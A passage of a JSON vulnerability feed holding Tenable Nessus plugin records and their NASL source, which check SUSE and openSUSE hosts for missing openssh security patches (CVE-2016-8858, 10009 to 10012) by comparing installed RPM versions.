(rpm_check(release:\"SLES12\", sp:\"1\", reference:\"openssh-askpass-gnome-debuginfo-6.6p1-54.7.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"openssh-debuginfo-6.6p1-54.7.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"openssh-debugsource-6.6p1-54.7.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"openssh-fips-6.6p1-54.7.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"openssh-helpers-6.6p1-54.7.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"openssh-helpers-debuginfo-6.6p1-54.7.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssh\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-11-03T12:18:45", "bulletinFamily": "scanner", "description": "This update for openssh fixes the following issues: Security issues\nfixed :\n\n - CVE-2016-8858: prevent resource depletion during key\n exchange (bsc#1005480)\n\n - CVE-2016-10009: limit directories for loading PKCS11\n modules to avoid privilege escalation (bsc#1016366)\n\n - CVE-2016-10011: Prevent possible leaks of host private\n keys to low-privilege process handling authentication\n (bsc#1016369) Non security issues fixed :\n\n - Properly verify CIDR masks in the AllowUsers and\n DenyUsers configuration lists (bsc#1005893)\n\n - fix suggested command for removing conflicting server\n keys from the known_hosts file (bsc#1006221)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2019-11-02T00:00:00", "id": "SUSE_SU-2017-0603-1.NASL", "href": "https://www.tenable.com/plugins/nessus/97549", "published": "2017-03-06T00:00:00", "title": "SUSE SLES11 Security Update : openssh (SUSE-SU-2017:0603-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2017:0603-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(97549);\n script_version(\"3.5\");\n script_cvs_date(\"Date: 2019/09/11 11:22:15\");\n\n script_cve_id(\"CVE-2016-10009\", \"CVE-2016-10011\", \"CVE-2016-8858\");\n\n script_name(english:\"SUSE SLES11 Security Update : openssh (SUSE-SU-2017:0603-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for openssh fixes the following issues: Security issues\nfixed :\n\n - CVE-2016-8858: prevent resource depletion during key\n exchange (bsc#1005480)\n\n - CVE-2016-10009: limit directories for loading PKCS11\n modules to avoid privilege escalation (bsc#1016366)\n\n - CVE-2016-10011: Prevent possible leaks of host private\n keys to low-privilege process handling authentication\n (bsc#1016369) Non security issues fixed :\n\n - Properly verify CIDR masks in the AllowUsers and\n DenyUsers configuration lists (bsc#1005893)\n\n - fix suggested command for removing conflicting server\n keys from the known_hosts file (bsc#1006221)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1005480\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1005893\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1006221\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1016366\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1016369\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-10009/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-10011/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-8858/\"\n );\n # https://www.suse.com/support/update/announcement/2017/suse-su-20170603-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?9e11187d\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server 11-SP4:zypper in -t patch\nslessp4-openssh-13002=1\n\nSUSE Linux Enterprise Debuginfo 11-SP4:zypper in -t patch\ndbgsp4-openssh-13002=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-askpass-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-fips\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-helpers\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/12/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/06\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES11)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES11\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES11\" && (! preg(pattern:\"^(4)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES11 SP4\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"openssh-6.6p1-35.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"openssh-askpass-gnome-6.6p1-35.4\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"openssh-fips-6.6p1-35.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"openssh-helpers-6.6p1-35.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssh\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-11-01T03:01:39", "bulletinFamily": "scanner", "description": "This update for openssh fixes several issues.\n\nThese security issues were fixed :\n\n - CVE-2016-8858: The kex_input_kexinit function in kex.c\n allowed remote attackers to cause a denial of service\n (memory consumption) by sending many duplicate KEXINIT\n requests (bsc#1005480).\n\n - CVE-2016-10012: The shared memory manager (associated\n with pre-authentication compression) did not ensure that\n a bounds check is enforced by all compilers, which might\n allowed local users to gain privileges by leveraging\n access to a sandboxed privilege-separation process,\n related to the m_zback and m_zlib data structures\n (bsc#1016370).\n\n - CVE-2016-10009: Untrusted search path vulnerability in\n ssh-agent.c allowed remote attackers to execute\n arbitrary local PKCS#11 modules by leveraging control\n over a forwarded agent-socket (bsc#1016366).\n\n - CVE-2016-10010: When forwarding unix domain sockets with\n privilege separation disabled, the resulting sockets\n have be created as ", "modified": "2019-11-02T00:00:00", "id": "OPENSUSE-2017-184.NASL", "href": "https://www.tenable.com/plugins/nessus/96919", "published": "2017-02-01T00:00:00", "title": "openSUSE Security Update : openssh (openSUSE-2017-184)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2017-184.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(96919);\n script_version(\"3.2\");\n script_cvs_date(\"Date: 2019/04/10 16:10:18\");\n\n script_cve_id(\"CVE-2016-10009\", \"CVE-2016-10010\", \"CVE-2016-10011\", \"CVE-2016-10012\", \"CVE-2016-8858\");\n\n script_name(english:\"openSUSE Security Update : openssh (openSUSE-2017-184)\");\n script_summary(english:\"Check for the openSUSE-2017-184 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for openssh fixes several issues.\n\nThese security issues were fixed :\n\n - CVE-2016-8858: The kex_input_kexinit function in kex.c\n allowed remote attackers to cause a denial of service\n (memory consumption) by sending many duplicate KEXINIT\n requests (bsc#1005480).\n\n - CVE-2016-10012: The shared memory manager (associated\n with pre-authentication compression) did not ensure that\n a bounds check is enforced by all compilers, which might\n allowed local users to gain privileges by leveraging\n access to a sandboxed privilege-separation process,\n related to the m_zback and m_zlib data structures\n (bsc#1016370).\n\n - CVE-2016-10009: Untrusted search path vulnerability in\n ssh-agent.c allowed remote attackers to execute\n arbitrary local PKCS#11 modules by leveraging control\n over a forwarded agent-socket (bsc#1016366).\n\n - CVE-2016-10010: When forwarding unix domain sockets with\n privilege separation disabled, the resulting sockets\n have be created as 'root' instead of the authenticated\n user. Forwarding unix domain sockets without privilege\n separation enabled is now rejected.\n\n - CVE-2016-10011: authfile.c in sshd did not properly\n consider the effects of realloc on buffer contents,\n which might allowed local users to obtain sensitive\n private-key information by leveraging access to a\n privilege-separated child process (bsc#1016369).\n\nThese non-security issues were fixed :\n\n - Adjusted suggested command for removing conflicting\n server keys from the known_hosts file (bsc#1006221)\n\n - Properly verify CIDR masks in configuration (bsc#1005893\n bsc#1021626)\n\nThis update was imported from the SUSE:SLE-12-SP2:Update update\nproject.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1005480\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1005893\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1006221\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1016366\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1016368\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1016369\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1016370\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1021626\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected openssh packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssh-askpass-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssh-askpass-gnome-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssh-cavs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssh-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssh-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssh-fips\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssh-helpers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssh-helpers-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/01/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/02/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.2\", reference:\"openssh-7.2p2-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"openssh-askpass-gnome-7.2p2-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"openssh-askpass-gnome-debuginfo-7.2p2-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"openssh-cavs-7.2p2-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"openssh-debuginfo-7.2p2-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"openssh-debugsource-7.2p2-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"openssh-fips-7.2p2-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"openssh-helpers-7.2p2-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"openssh-helpers-debuginfo-7.2p2-9.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssh-askpass-gnome / openssh-askpass-gnome-debuginfo / openssh / etc\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-11-03T12:18:41", "bulletinFamily": "scanner", "description": "This update for openssh fixes several issues. These security issues\nwere fixed :\n\n - CVE-2016-8858: The kex_input_kexinit function in kex.c\n allowed remote attackers to cause a denial of service\n (memory consumption) by sending many duplicate KEXINIT\n requests (bsc#1005480).\n\n - CVE-2016-10012: The shared memory manager (associated\n with pre-authentication compression) did not ensure that\n a bounds check is enforced by all compilers, which might\n allowed local users to gain privileges by leveraging\n access to a sandboxed privilege-separation process,\n related to the m_zback and m_zlib data structures\n (bsc#1016370).\n\n - CVE-2016-10009: Untrusted search path vulnerability in\n ssh-agent.c allowed remote attackers to execute\n arbitrary local PKCS#11 modules by leveraging control\n over a forwarded agent-socket (bsc#1016366).\n\n - CVE-2016-10010: When forwarding unix domain sockets with\n privilege separation disabled, the resulting sockets\n have be created as ", "modified": "2019-11-02T00:00:00", "id": "SUSE_SU-2017-0264-1.NASL", "href": "https://www.tenable.com/plugins/nessus/96718", "published": "2017-01-24T00:00:00", "title": "SUSE SLED12 / SLES12 Security Update : openssh (SUSE-SU-2017:0264-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2017:0264-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(96718);\n script_version(\"3.6\");\n script_cvs_date(\"Date: 2019/09/11 11:22:14\");\n\n script_cve_id(\"CVE-2016-10009\", \"CVE-2016-10010\", \"CVE-2016-10011\", \"CVE-2016-10012\", \"CVE-2016-8858\");\n\n script_name(english:\"SUSE SLED12 / SLES12 Security Update : openssh (SUSE-SU-2017:0264-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for openssh fixes several issues. These security issues\nwere fixed :\n\n - CVE-2016-8858: The kex_input_kexinit function in kex.c\n allowed remote attackers to cause a denial of service\n (memory consumption) by sending many duplicate KEXINIT\n requests (bsc#1005480).\n\n - CVE-2016-10012: The shared memory manager (associated\n with pre-authentication compression) did not ensure that\n a bounds check is enforced by all compilers, which might\n allowed local users to gain privileges by leveraging\n access to a sandboxed privilege-separation process,\n related to the m_zback and m_zlib data structures\n (bsc#1016370).\n\n - CVE-2016-10009: Untrusted search path vulnerability in\n ssh-agent.c allowed remote attackers to execute\n arbitrary local PKCS#11 modules by leveraging control\n over a forwarded agent-socket (bsc#1016366).\n\n - CVE-2016-10010: When forwarding unix domain sockets with\n privilege separation disabled, the resulting sockets\n have be created as 'root' instead of the authenticated\n user. Forwarding unix domain sockets without privilege\n separation enabled is now rejected.\n\n - CVE-2016-10011: authfile.c in sshd did not properly\n consider the effects of realloc on buffer contents,\n which might allowed local users to obtain sensitive\n private-key information by leveraging access to a\n privilege-separated child process (bsc#1016369).\n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1005480\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1005893\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1006221\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1016366\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1016368\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1016369\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1016370\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-10009/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-10010/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-10011/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-10012/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-8858/\"\n );\n # https://www.suse.com/support/update/announcement/2017/suse-su-20170264-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?bec09483\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server for Raspberry Pi 12-SP2:zypper in -t\npatch SUSE-SLE-RPI-12-SP2-2017-138=1\n\nSUSE Linux Enterprise Server 12-SP2:zypper in -t patch\nSUSE-SLE-SERVER-12-SP2-2017-138=1\n\nSUSE Linux Enterprise Desktop 12-SP2:zypper in -t patch\nSUSE-SLE-DESKTOP-12-SP2-2017-138=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-askpass-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-askpass-gnome-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-fips\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-helpers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-helpers-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/12/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/01/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/01/24\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED12|SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12 / SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP2\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED12\" && (! preg(pattern:\"^(2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP2\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"openssh-7.2p2-66.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"openssh-askpass-gnome-7.2p2-66.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"openssh-askpass-gnome-debuginfo-7.2p2-66.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"openssh-debuginfo-7.2p2-66.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"openssh-debugsource-7.2p2-66.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"openssh-fips-7.2p2-66.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"openssh-helpers-7.2p2-66.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"openssh-helpers-debuginfo-7.2p2-66.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"openssh-7.2p2-66.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"openssh-askpass-gnome-7.2p2-66.3\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"openssh-askpass-gnome-debuginfo-7.2p2-66.3\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"openssh-debuginfo-7.2p2-66.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"openssh-debugsource-7.2p2-66.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"openssh-helpers-7.2p2-66.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"openssh-helpers-debuginfo-7.2p2-66.1\")) flag++;\n\n\nif 